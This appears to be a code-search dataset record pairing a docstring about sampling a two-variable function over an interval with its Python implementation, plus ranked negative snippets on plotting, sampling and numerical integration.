"def localfiles_for_update(self, localfiles, obsfiles):\n upload_local_files = []\n obs_dict = {}\n for key, mtime, size in obsfiles:\n obs_dict[key.strip('/')] = mtime\n\n for localfile in localfiles:\n filepath, key = localfile\n fullkey = key + '/' + os.path.basename(filepath)\n fullkey = fullkey.strip('/')\n if fullkey in obs_dict.keys():\n localfile_timestamp = os.path.getmtime(filepath)\n obsfile_timestamp = time.mktime(time.strptime(obs_dict[fullkey], \"%Y/%m/%d %H:%M:%S\"))\n\n if localfile_timestamp > obsfile_timestamp:\n upload_local_files.append(localfile)\n else:\n upload_local_files.append(localfile)\n return upload_local_files",
"def svn_fs_access_add_lock_token(*args):\r\n return _fs.svn_fs_access_add_lock_token(*args)",
"def files(self, only_unlocked=False):\n # pylint: disable=no-member\n xdd = builtins.__xonsh_env__.get('XONSH_DATA_DIR')\n xdd = expanduser_abs_path(xdd)\n\n fs = [f for f in glob.iglob(os.path.join(xdd, 'xonsh-*.json'))]\n files = []\n for f in fs:\n try:\n lj = LazyJSON(f, reopen=False)\n if only_unlocked and lj['locked']:\n continue\n # info: closing timestamp, number of commands, filename\n files.append((lj['ts'][1] or time.time(),\n len(lj.sizes['cmds']) - 1,\n f))\n lj.close()\n except (IOError, OSError, ValueError):\n continue\n files.sort()\n return files",
"def addMasters(self,masterNames):\n #--Load Masters\n #--Master FileRefs\n proItems = []\n totSize = 0\n for masterName in masterNames:\n #--Don't have fileRef? FileRef out of date?\n masterInfo = modInfos[masterName]\n fileRefs = masterInfo.extras.get('FileRefs')\n if not fileRefs:\n fileRefs = masterInfo.extras['FileRefs'] = FileRefs(masterInfo,True,True)\n fileRefs.setDebrisIds()\n refreshSize = fileRefs.refreshSize()\n if refreshSize:\n proItems.append((fileRefs,refreshSize))\n totSize += refreshSize\n #--Refresh masters\n cumSize = 0\n for (fileRefs,size) in proItems:\n self.progress.setBaseScale(1.0*cumSize/totSize, 1.0*size/totSize)\n fileRefs.progress = self.progress\n fileRefs.refresh()\n cumSize += size\n #--Do Mapping\n del proItems[:]\n totSize = 0\n for masterName in masterNames:\n size = len(modInfos[masterName].extras['FileRefs'].cells)\n proItems.append((masterName,size))\n totSize += size\n cumSize = 0\n for (masterName,size) in proItems:\n if size: self.progress.setBaseScale(1.0*cumSize/totSize, 1.0*size/totSize)\n self.addMaster(masterName)\n cumSize += size",
"def set_in_files():\r\n\tindatadir = '/nobackup/ejblom/reddit'\r\n\tcom_dir = '/comments'\r\n\tsubm_dir = '/submissions'\r\n\tglob_end = '/filtered*'\r\n\tcom_glob_str = indatadir + com_dir + glob_end\r\n\tsubm_glob_str = indatadir + subm_dir + glob_end\r\n\tinfilenames = sorted(glob.glob(com_glob_str)) + sorted(glob.glob(subm_glob_str))\r\n\treturn infilenames",
"def add_files_and_directories_rename(self, **kwargs):\n self.rename_files_or_directories_objects.append(\n RenameFilesOrDirectories(\n root_directory=self.root_directory,\n exclude_directories=self.exclude_directories,\n exclude_files=self.exclude_files,\n **kwargs\n )\n )",
"def synchronize(self):\n self.increment_pc()\n shares = [self._exchange_shares(player, GF256(0))\n for player in self.players]\n result = gather_shares(shares)\n result.addCallback(lambda _: None)\n return result",
"def wingrep(self):\n for folder, files_ in self.walk():\n listed_files = self.list_appro_files(folder, files_)\n for file_o in self.open_files(listed_files=listed_files):\n self.search_in(file_o)",
"def defineMergeJobs(self, mergeableFiles):\n mergeJobFileSize = 0\n mergeJobEvents = 0\n mergeJobFiles = []\n earliestInsert = 999999999999999\n\n mergeableFiles.sort(key=cmp_to_key(fileCompare))\n\n for mergeableFile in mergeableFiles:\n if mergeableFile[\"file_size\"] > self.maxMergeSize or \\\n mergeableFile[\"file_events\"] > self.maxMergeEvents:\n self.createMergeJob([mergeableFile])\n continue\n elif mergeableFile[\"file_size\"] + mergeJobFileSize > self.maxMergeSize or \\\n mergeableFile[\"file_events\"] + mergeJobEvents > self.maxMergeEvents:\n if mergeJobFileSize > self.minMergeSize or \\\n self.forceMerge == True or \\\n time.time() - mergeableFile['insert_time'] > self.maxWaitTime:\n self.createMergeJob(mergeJobFiles)\n mergeJobFileSize = 0\n mergeJobEvents = 0\n mergeJobFiles = []\n else:\n continue\n\n mergeJobFiles.append(mergeableFile)\n mergeJobFileSize += mergeableFile[\"file_size\"]\n mergeJobEvents += mergeableFile[\"file_events\"]\n if mergeableFile['insert_time'] < earliestInsert:\n earliestInsert = mergeableFile['insert_time']\n\n if mergeJobFileSize > self.minMergeSize or self.forceMerge == True or \\\n time.time() - earliestInsert > self.maxWaitTime:\n if len(mergeJobFiles) > 0:\n self.createMergeJob(mergeJobFiles)\n\n return",
"def populateFileList(self):\n\n self.m_fileList.SetForegroundColour(wx.NullColour)\n\n # We'll need to track which file names are modified and which\n # file names duped.\n applicable, dupes = set(), set()\n\n if not self.m_validPatterns:\n # Regex's don't compile yet, just use the raw filename list.\n newNames = self.m_diskNames\n\n else:\n # Apply the substitution to the filename list to produce a\n # destination-name list, and identify whether the patterns\n # actually affect anything.\n #\n newNames, modifiedIndexes = [], []\n\n matcher = re.compile(self.m_reFromCtl.Value).subn\n subs = self.m_reToCtl.Value\n\n for filename in self.m_diskNames:\n # Perform the sub\n (filename, numChanges) = matcher(subs, filename)\n\n # Was there a modification?\n if numChanges:\n # Record the affected name.\n applicable.add(filename)\n if filename in newNames:\n dupes.add(filename)\n\n # Add to the primary list\n newNames.append(filename)\n\n # Does this produce a different list than we already had? If so,\n # clear the file list and replace it with the new one.\n #\n if newNames != self.m_newNames:\n\n self.m_fileList.Clear()\n\n # Figure out the longest name so we can create a cleanly-formatted\n # set of prefix/suffix characters for the modified/duped annotation.\n #\n maxLen = max(map(len, newNames))\n decorate = '{m} {fn:<{ml}} {m}'.format\n\n # Now build a list of display elements.\n for filename in newNames:\n mark = ' ' if filename not in applicable else '|'\n if filename in dupes:\n mark = '*'\n self.m_fileList.Append(decorate(m=mark, fn=filename, ml=maxLen))\n\n # Keep the list.\n self.m_newNames[:] = newNames\n\n # Update the apply button, we only want it enabled when the user\n # has a valid set of patterns that affect any files and have no\n # dupes produced as a result.\n #\n self.m_applyBtn.Enabled = bool(applicable) and not dupes\n\n if dupes:\n # Emphasize the presence of dupes.\n self.m_fileList.SetForegroundColour(wx.RED)\n\n # Draw the list.\n self.m_fileList.Refresh()",
"def filter_filelist(files: list, hour_mod: int = 12, min_mod: int = 60) -> list:\n files_restricted = []\n if hour_mod == 0 and min_mod == 0:\n files_restricted.append(sorted(files)[-1])\n else:\n for file in files:\n hour = int(file.split(\"_\")[3][8:10])\n minute = int(file.split(\"_\")[3][10:12])\n if hour % hour_mod == 0 and minute % min_mod == 0:\n files_restricted.append(file)\n logging.debug(f'Remote file added: {file}')\n else:\n logging.debug(f'Remote file ignored: {file}')\n logging.info('Files to be downloaded has been reduced from {} to {}'.format(len(files), len(files_restricted)))\n return files_restricted",
"def git_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None\n for dirpath, _dirnames, filenames in os.walk(os.path.join(data_context().content.root, '.git')):\n paths = [os.path.join(dirpath, filename) for filename in filenames]\n files.extend((path, os.path.relpath(path, data_context().content.root)) for path in paths)",
"def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False",
"def merge_files():\n # abs path of data folder\n work_folder = os.path.join(CURRENT_FOLDER, \"..\\\\Data\\\\weather_data\\\\KORD\")\n file_list = os.listdir(work_folder)\n with open(os.path.join(work_folder, \"..\\\\merged_history_KORD.csv\"), \"w\") as outfile:\n for line in open(os.path.join(work_folder, file_list[0])):\n outfile.write(line)\n print \"write the first line\"\n for i in range(1, len(file_list)):\n with open(os.path.join(work_folder, file_list[i])) as infile:\n infile.next()\n for line in infile:\n outfile.write(line)",
"def write_cache_file_list(self, file_list=None):\n if file_list:\n self.add_filelist_to_cache(file_list)\n cache_list = []\n for finfo in self.cache_file_list_dict.values():\n cache_list.append(finfo.output_cache_tuple())\n return self.write_pickle_object_to_file(tuple(cache_list))",
"def setfiles(self, filelist):\r\n self._filelist=filelist\r\n self._energy=self.readenergy(filelist)",
"def upload(self, folder_list, files):\n current_folder_id = self.top_folder_id\n for fname in folder_list:\n current_folder_id = self._fetch_or_create_folder(fname, current_folder_id)\n for file in files:\n self._upload_detail(file, current_folder_id)",
"def main(root, filelist):\n #print \"got %s: %s\" % (root, filelist)\n rename(root, filelist)",
"def getLockInfoOfNonDerivedFiles(self, ids, wspLockId):\n sql = \"\"\"\n SELECT cdb_file.cdb_lock,\n cdb_file.cdb_lock_id,\n cdb_file.cdbf_object_id,\n cdb_file.cdb_object_id,\n angestellter.name AS mapped_cdb_lock_name\n FROM\n cdb_file\n LEFT JOIN\n angestellter\n ON\n cdb_file.cdb_lock = angestellter.personalnummer\n WHERE\n cdb_file.cdb_classname = 'cdb_file'\n AND (cdb_file.cdb_belongsto='' OR cdb_file.cdb_belongsto IS NULL)\n \"\"\"\n records = partionedSqlQuery(sql, \"cdb_file.cdbf_object_id\", ids)\n res = defaultdict(dict)\n for r in records:\n status = u\"not\"\n lockerName = u\"\"\n locker = r.cdb_lock\n if locker:\n lockerName = r.mapped_cdb_lock_name\n if lockerName is None:\n misc.cdblogv(misc.kLogMsg, 0,\n \"WsObjectCache, warning: file '%s' of document '%s' is locked\"\n \" by unknown user '%s' (no matching name in 'angestellter')\"\n % (r.cdb_object_id, r.cdbf_object_id, locker))\n lockerName = u\"\"\n if locker == auth.persno:\n status = u\"self\"\n lockId = r.cdb_lock_id\n if lockId and wspLockId:\n if lockId != wspLockId:\n status = u\"other_ws\"\n else:\n status = u\"other\"\n res[r.cdbf_object_id][r.cdb_object_id] = {'status': status, 'locker': lockerName}\n return res",
"def sync():\n _ownered_project = []\n _tmp_project_list = get_user_repo_list(current_user.username)\n if _tmp_project_list:\n for project in _tmp_project_list:\n _ownered_project.append((project, project))\n # Add upperstream_repo\n upperstream_repo = get_upperstream_repo(project)\n if upperstream_repo is not None:\n _ownered_project.append((upperstream_repo, upperstream_repo + \"(Upperstream of %s)\" % project))\n\n User.objects(username=current_user.username).update_one(set__owned_repo_sync_time=datetime.utcnow())\n\n # mongoDB don't support key value contains '.'\n for i in range(len(_ownered_project)):\n _ownered_project[i] = (_ownered_project[i][0].replace('.', '[dot]'), _ownered_project[i][1])\n User.objects(username=current_user.username).update_one(set__owned_repo=dict(_ownered_project))\n\n flash('Refresh your own GitHub repositories list successfully!', 'success')\n return redirect(url_for('main.load_from_github'))",
"def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist",
"def sync_ready_files(self, sync_config=None):\n\n if sync_config is None:\n sync_config = config.getSettingJson(config.CONSENT_SYNC_BUCKETS)\n\n hpos_sync_config = sync_config['hpos']\n orgs_sync_config = sync_config['orgs']\n\n filters = {\n hpo_name: {\n 'exclude_types': [\n ConsentType(excluded_type_str) for excluded_type_str in options['exclude_types']\n ]\n }\n for hpo_name, options in hpos_sync_config.items()\n if 'exclude_types' in options\n }\n file_list: List[ConsentFile] = self.consent_dao.get_files_ready_to_sync(\n hpo_names=hpos_sync_config.keys(),\n org_names=orgs_sync_config.keys(),\n additional_filters=filters\n )\n\n pairing_info_map = self._build_participant_pairing_map(file_list)\n\n # Build out a FileSync for each possible PairingInfo\n sync_pairing_map: Dict[ParticipantPairingInfo, BaseFileSync] = {}\n for pairing_info in pairing_info_map.values():\n if pairing_info not in sync_pairing_map:\n org_config = orgs_sync_config.get(pairing_info.org_name)\n if org_config:\n config_data = org_config\n else:\n config_data = hpos_sync_config.get(pairing_info.hpo_name)\n\n if not config_data:\n # No need to build sync handlers for anything not in the config\n continue\n\n sync_pairing_map[pairing_info] = self._build_sync_handler(\n zip_files=config_data['zip_consents'],\n bucket=config_data['bucket'],\n pairing_info=pairing_info\n )\n\n for file in file_list:\n pairing_info = pairing_info_map.get(file.participant_id, None)\n if not pairing_info:\n # Skip files for unpaired participants\n continue\n\n # Retrieve the sync handler based on the pairing information\n file_group = sync_pairing_map.get(pairing_info)\n if not file_group:\n # Ignore participants paired to an org or hpo we aren't syncing files for\n continue\n\n file_group.files_to_sync.append(file)\n\n with self.consent_dao.session() as session:\n for file_group in sync_pairing_map.values():\n files_synced = file_group.sync_file_list()\n\n # Update the database after each group syncs so ones\n # that have succeeded so far get saved if a later one fails\n if len(files_synced):\n self.consent_dao.batch_update_consent_files(session=session, consent_files=files_synced)\n session.commit()\n\n # Queue tasks to rebuild consent metrics resource data records (for PDR)\n dispatch_rebuild_consent_metrics_tasks([file.id for file in files_synced])",
"def files_distribute(self):\n self._post('files/distribute')",
"def merge_lock(poetry: Poetry) -> None:\n lock_data = load(poetry.locker)\n save(poetry.locker, lock_data, poetry.package)",
"def _replace_files(self, index_key, media_key, new_list, fundamentals):\n _index=fundamentals.get(index_key, {})\n _media=fundamentals.get(media_key, {})\n for _file in new_list:\n _data=self._item_from_index(_file, 'data', _media)\n if not _data:\n self.log('Failed to write file %s due to no data'%_file)\n continue\n _file_name=self._item_from_index(_file, 'filename', _index)\n if _file_name:\n _stat=self.statfile(_file_name)\n if _stat and _stat['size']!=len(_data):\n try:\n self.writefile(_file_name, _data)\n except:\n self.log('Failed to write BREW file '+_file_name)\n if __debug__:\n raise",
"def blocking_transfer(self, filelist):\n miscutils.fwdebug_print(\"\\tNumber files to transfer: %d\" % len(filelist))\n if miscutils.fwdebug_check(1, \"ARCHIVETRANSFER_DEBUG\"):\n miscutils.fwdebug_print(\"\\tfilelist: %s\" % filelist)\n\n srcroot = self.src_archive_info['root']\n dstroot = self.dst_archive_info['root']\n\n files2copy = copy.deepcopy(filelist)\n for _, finfo in files2copy.items():\n finfo['src'] = '%s/%s' % (srcroot, finfo['src'])\n finfo['dst'] = '%s/%s' % (dstroot, finfo['dst'])\n\n transresults = disk_utils_local.copyfiles(files2copy, None)\n\n return transresults",
"def _lock(self):\n self._lockFile = open(self._lockFilename, \"w\")\n self._lockFile.write(\"%d\" % (os.getpid()))\n self._lockFile.flush()",
"def prepare_list_of_files(kernel_name, kernel_file_list, params, grid, threads, block_size_names):\n temp_files = dict()\n\n kernel_string = get_kernel_string(kernel_file_list[0], params)\n name, kernel_string = prepare_kernel_string(kernel_name, kernel_string, params, grid, threads, block_size_names)\n\n if len(kernel_file_list) > 1:\n for f in kernel_file_list[1:]:\n #generate temp filename with the same extension\n temp_file = get_temp_filename(suffix=\".\" + f.split(\".\")[-1])\n temp_files[f] = temp_file\n #add preprocessor statements to the additional file\n _, temp_file_string = prepare_kernel_string(kernel_name, get_kernel_string(f, params), params, grid, threads, block_size_names)\n write_file(temp_file, temp_file_string)\n #replace occurences of the additional file's name in the first kernel_string with the name of the temp file\n kernel_string = kernel_string.replace(f, temp_file)\n\n return name, kernel_string, temp_files",
"def create_lock_file():\n\n print(\"Creating lock file\")",
"def add_files_to_zip(\n file_list, common_root_directory, zip_handler, put_all_files_in_shared_root_dir\n):\n for file_path in file_list:\n rel_path = file_path\n if common_root_directory is not None:\n rel_path = os.path.relpath(file_path, common_root_directory)\n else:\n # If we don't have a common root dir then, on Windows, path will begin with drive letter\n # e.g. 'C:\\' - remove this for adding to the ZIP\n if platform.system() == \"Windows\":\n rel_path = rel_path.replace(\":\", \"\")\n try:\n if put_all_files_in_shared_root_dir and common_root_directory is not None:\n zip_handler.write(\n file_path,\n arcname=os.path.join(os.path.basename(common_root_directory), rel_path),\n )\n else:\n zip_handler.write(file_path, arcname=rel_path)\n except IOError:\n printer(\n \"'{}' no longer present in folder - zip creation aborted\".format(file_path),\n \"error\",\n True,\n )\n raise\n except OSError:\n printer(\"OSError on '{}' - zip creation aborted\".format(file_path), \"error\", True)\n raise",
"def _add_manifest_files(zip_file, dir_name, payload_info_list, tag_info_list):\n for checksum_algorithm in _get_checksum_algorithm_set(payload_info_list):\n _add_tag_file(\n zip_file,\n dir_name,\n tag_info_list,\n _gen_manifest_file_tup(payload_info_list, checksum_algorithm),\n )",
"def upload_files(self, files):\n\n for f in files:\n self.scp.put(f, recursive=True)",
"def process_files(exp_folders):\n pool = mp.Pool()\n results = pool.imap_unordered(read_and_serialize, exp_folders)\n\n stat = []\n for res in results:\n print(res)\n stat.append(res)\n\n pool.close()\n pool.join()",
"def syncfolder():",
"def loadInputFiles(self):\n\t\tfor filename in self.input_filename_list:\n\t\t\tfor module in self.modules:\n\t\t\t\tmodule.Add(filename)",
"def add_files(self):\n file_paths = tkinter.filedialog.askopenfilenames(parent=self)\n\n if not file_paths:\n return\n for file_path in file_paths:\n self.files_treeview.insert(\"\", \"end\", values=(file_path,))\n self.files_treeview.selection_set(self.files_treeview.get_children()[-1])",
"def createFileList(self):\r\n if self.childFileListDownload is None or not self.childFileListDownload.is_alive():\r\n self.childFileListDownload = multiprocessing.Process(target=self.createFileListHTTP, args=(self.server, self.directory))\r\n self.childFileListDownload.start()"
] | [
"0.5858453",
"0.5857905",
"0.5442941",
"0.5427439",
"0.5369485",
"0.534254",
"0.5242692",
"0.5233011",
"0.52133423",
"0.51889026",
"0.51700175",
"0.51625514",
"0.5118121",
"0.5110031",
"0.50916535",
"0.5077471",
"0.5056525",
"0.5047517",
"0.50415224",
"0.50407803",
"0.50310415",
"0.50032467",
"0.49873388",
"0.49867135",
"0.49853197",
"0.49367034",
"0.49278733",
"0.49048927",
"0.48945892",
"0.48774955",
"0.48757705",
"0.4868424",
"0.48330647",
"0.48270535",
"0.48059884",
"0.4800957",
"0.47996476",
"0.47986957",
"0.47923377",
"0.4784794",
"0.4770063",
"0.4757243",
"0.4756429",
"0.4740982",
"0.4740402",
"0.47184512",
"0.47064188",
"0.4701494",
"0.46890834",
"0.4686908",
"0.46833098",
"0.46705067",
"0.46669143",
"0.4660952",
"0.46540475",
"0.46505398",
"0.4643907",
"0.46393213",
"0.46392995",
"0.4629129",
"0.46290788",
"0.46219367",
"0.4620757",
"0.46154115",
"0.46036127",
"0.45879766",
"0.4587104",
"0.45858932",
"0.45855638",
"0.45670807",
"0.4564829",
"0.45554876",
"0.45554143",
"0.45544338",
"0.45447424",
"0.45409322",
"0.45369944",
"0.45357588",
"0.4534035",
"0.45301998",
"0.45283294",
"0.45270038",
"0.45166636",
"0.45147595",
"0.4512996",
"0.45063812",
"0.45049688",
"0.45010754",
"0.45004067",
"0.44998848",
"0.4498591",
"0.44961262",
"0.44917104",
"0.44913235",
"0.44774613",
"0.447644",
"0.44691503",
"0.44686478",
"0.4458599",
"0.44559982"
] | 0.785469 | 0 |
x.__init__(...) initializes x; see help(type(x)) for signature | def __init__(self, *more): # real signature unknown; restored from __doc__
pass | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def x_init(self):\n pass",
"def init(self, *args, **kwds):\n pass",
"def __init__(self, x=None, y=None):\n if y is None:\n if x is None:\n object.__setattr__(self, 'x', 0)\n object.__setattr__(self, 'y', 0)\n else:\n object.__setattr__(self, 'x', x[0])\n object.__setattr__(self, 'y', x[1])\n else:\n object.__setattr__(self, 'x', x)\n object.__setattr__(self, 'y', y)",
"def __init__(self, xstart, **more_args):\r\n self.xstart = xstart\r\n self.more_args = more_args\r\n self.initialize()",
"def __init__(self, x=None):\n # Unpack the parameters or use default values.\n if x is None:\n self.nt_probs = np.ones(4) / 4\n self.kappa = 2.0\n self.penalty = 0\n else:\n info = self._unpack_params(x)\n self.nt_probs, self.kappa, self.penalty = info\n\n # Mark some downstream attributes as not initialized.\n self._invalidate()",
"def __init__(self, x=0, y=0, z=0):\n if type(x) is tuple:\n self.x = x[0]\n self.y = x[1]\n self.z = x[2]\n elif type(x) is vector:\n self.x = x.x\n self.y = x.y\n self.z = x.z\n else:\n self.x = x\n self.y = y\n self.z = z",
"def initialize(self, *args, **kwargs):",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown; restored from __doc__\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args, **kwargs) -> None:\n pass",
"def __init__(self, *args, **kwargs) -> None:\n pass",
"def __init__(self, x=None):\r\n self.v = x\r\n self.cl = None\r\n self.cr = None\r\n return None",
"def initialize(self, *args, **kwargs):\n pass",
"def initialize_(x, spec):\n activate(x, spec, lookup=[nn.init])",
"def __init__(self, **kwds):\n raise NotImplementedError",
"def __init__ (self):\n self.x = 10",
"def __init__(self, initX, initY):\n self.x = initX\n self.y = initY",
"def __init__(self, initX, initY):\n self.x = initX\n self.y = initY",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(self, gamma=None, x0=None):\n if gamma is not None and x0 is not None:\n self._initialize(gamma, x0)",
"def initialize(self, **kwargs):",
"def __init__(self, *args):\n pass",
"def __init__():",
"def initialize(cls):",
"def init(self) -> None:"
] | [
"0.7523401",
"0.75223213",
"0.71459436",
"0.7083094",
"0.7015502",
"0.68367285",
"0.6812456",
"0.6742144",
"0.6742144",
"0.6742144",
"0.67186326",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67132217",
"0.67132217",
"0.6712598",
"0.6707006",
"0.6696875",
"0.66729563",
"0.6666136",
"0.663887",
"0.663887",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.6597404",
"0.65855956",
"0.65846837",
"0.6584464",
"0.6577272",
"0.6575179"
] | 0.6569203 | 96 |
r""" Samples a 2d function f over specified intervals and returns two arrays (X, Y) suitable for plotting with matlab (matplotlib) syntax. See examples\mplot2d.py. f is a function of one variable, such as x2. x_args is an interval given in the form (var, min, max, n) | def sample2d(f, x_args):
try:
f = sympify(f)
except SympifyError:
raise ValueError("f could not be interpreted as a SymPy function")
try:
x, x_min, x_max, x_n = x_args
except (TypeError, IndexError):
raise ValueError("x_args must be a tuple of the form (var, min, max, n)")
x_l = float(x_max - x_min)
x_d = x_l/float(x_n)
X = np.arange(float(x_min), float(x_max) + x_d, x_d)
Y = np.empty(len(X))
for i in range(len(X)):
try:
Y[i] = float(f.subs(x, X[i]))
except TypeError:
Y[i] = None
return X, Y | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def sample3d(f, x_args, y_args):\n x, x_min, x_max, x_n = None, None, None, None\n y, y_min, y_max, y_n = None, None, None, None\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n y, y_min, y_max, y_n = y_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args and y_args must be tuples of the form (var, min, max, intervals)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n y_l = float(y_max - y_min)\n y_d = y_l/float(y_n)\n y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)\n\n def meshgrid(x, y):\n \"\"\"\n Taken from matplotlib.mlab.meshgrid.\n \"\"\"\n x = np.array(x)\n y = np.array(y)\n numRows, numCols = len(y), len(x)\n x.shape = 1, numCols\n X = np.repeat(x, numRows, 0)\n\n y.shape = numRows, 1\n Y = np.repeat(y, numCols, 1)\n return X, Y\n\n X, Y = np.meshgrid(x_a, y_a)\n\n Z = np.ndarray((len(X), len(X[0])))\n for j in range(len(X)):\n for k in range(len(X[0])):\n try:\n Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))\n except (TypeError, NotImplementedError):\n Z[j][k] = 0\n return X, Y, Z",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def show_trace_2d(f, results): #@save\n set_figsize()\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def show_trace_2d(f, results): #@save\n d2l.set_figsize()\n d2l.plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = d2l.meshgrid(d2l.arange(-5.5, 1.0, 0.1),\n d2l.arange(-3.0, 1.0, 0.1))\n d2l.plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n d2l.plt.xlabel('x1')\n d2l.plt.ylabel('x2')",
"def display(f, x_min, x_max, delta=0.001):\n x = list(drange(x_min, x_max,delta))\n y = [f(i) for i in x]\n plt.title(f.__name__)\n plt.grid(True)\n plt.xlabel('X')\n plt.ylabel('Y= '+f.__name__ + '(X)')\n plt.plot(x,y, 'r')\n plt.show()",
"def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2",
"def create_data(f, x_vals):\n y_vals = []\n for i in x_vals:\n y_vals.append(f(x_vals[i]))\n return np.array(y_vals)",
"def sample(f, *var_args):\n if len(var_args) == 1:\n return sample2d(f, var_args[0])\n elif len(var_args) == 2:\n return sample3d(f, var_args[0], var_args[1])\n else:\n raise ValueError(\"Only 2d and 3d sampling are supported at this time.\")",
"def simps_2d_py(fxy, x, y):\n\n I_simps = 0.0\n\n N = x.size\n\n h_x = (x.max() - x.min())/(N - 1)\n h_y = (y.max() - y.min())/(N - 1)\n\n S = S_simps(N)\n\n for i in range(x.size):\n\n for j in range(y.size):\n\n I_simps += 1.0/9 * h_x * h_y * S[i, j] * fxy[i, j]\n\n return I_simps",
"def sp_integrate_2D ( func ,\n xmin , xmax ,\n ymin , ymax , *args , **kwargs ) :\n from scipy import integrate\n ##\n result = integrate.dblquad ( func ,\n ymin ,\n ymax ,\n lambda x : xmin ,\n lambda x : xmax , \n *args , **kwargs )\n return result[0]",
"def get_extremum(f,\n dx=0.05, dy=0.05,\n ylims=[-2, 2], xlims=[-2, 2]):\n # generate 2 2d grids for the x & y bounds\n ymin, ymax = ylims\n xmin, xmax = xlims\n y, x = np.mgrid[slice(ymin, ymax + dy, dy),\n slice(xmin, xmax + dx, dx)]\n\n # create f(x, y)\n z = np.zeros(x.shape)\n for i in range(x.shape[0]):\n for j in range(y.shape[0]):\n xy = np.array([x[i, j], y[i, j]]).reshape(1, -1)\n z[i, j] = f(xy)\n\n return np.max(z), np.min(z)",
"def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
